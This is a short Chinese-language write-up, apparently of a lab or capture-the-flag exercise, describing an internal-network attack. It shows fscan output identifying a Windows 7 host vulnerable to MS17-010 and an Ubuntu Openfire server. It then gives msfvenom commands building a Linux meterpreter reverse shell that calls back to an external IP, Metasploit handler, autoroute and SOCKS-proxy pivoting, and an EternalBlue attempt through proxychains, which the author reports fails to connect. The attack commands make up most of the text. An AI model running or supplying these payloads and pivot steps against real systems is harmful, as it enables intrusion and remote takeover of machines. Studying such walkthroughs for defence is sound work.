真他妈的抽象

首先是个扫描,扫到password.txt

接下来有个rce,上线fscan,然后查询,发现两个ip

172.26.21.50Windows
172.26.21.60外面的Ubuntu web服务机

172.26.21.60:22 open
172.26.21.50:80 open
172.26.21.50:445 open
172.26.21.50:139 open
172.26.21.50:135 open
172.26.21.60:7777 open
172.26.21.60:9091 open
172.26.21.60:9090 open
172.26.21.60:7070 open
[*] WebTitle: http://172.26.21.50       code:200 len:689    title:IIS7
[+] 172.26.21.50        MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://172.26.21.60:7070  code:200 len:223    title:Openfire HTTP Binding Service
[*] WebTitle: http://172.26.21.60:9090  code:200 len:115    title:None
[+] 172.26.21.50 has DOUBLEPULSAR SMB IMPLANT
[*] WebTitle: https://172.26.21.60:9091 code:200 len:115    title:None

然后

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=165.154.5.221 LPORT=9999 -f elf > shell.elf
#把shell.elf上传到linux(被攻击)

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 165.154.5.221
set lport 9999
run

#linux(被攻击)上运行那个elf文件,连接成功

run get_local_subnets
run autoroute -s 172.26.21.0/255.255.255.0
#设置一个具体的session
run autoroute -p


#设置代理
background
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run

开另一个终端,用p4

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.26.21.50
exploit

然后恭喜你,连不上了

返回session

sessions
sessions -i id